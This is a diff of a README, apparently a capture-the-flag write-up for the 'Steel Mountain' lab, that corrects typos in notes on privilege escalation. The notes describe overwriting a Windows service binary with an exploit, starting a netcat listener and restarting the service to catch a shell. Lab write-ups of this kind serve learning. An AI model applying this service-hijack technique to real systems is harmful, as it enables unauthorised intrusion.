rnbochsr/Steel_Mountain/README.md

 * `powershell_shell`
 * Stop service `Stop-Service AdvancedSystemCareService9`
 * Move into ASC directory `cd 'C:\Program Files (x86)\IObit\Advanced SystemCare'`
 * Renaming, moving, deleting the ASCService.exe didn't work.
-So I just tried to upload my version hoping it would overwrite the eisting file.
+So I just tried to upload my version hoping it would overwrite the existing file.
 It did!
 	* Exit out of PowerShell `CTRL-C`
-	* `upload ASCServie.exe`
+	* `upload ASCService.exe`
 	* File's last modified date didn't change but it was now the same size as my exploit.
 * Start my listener `nc -lvnp 4444`
 * Restart the service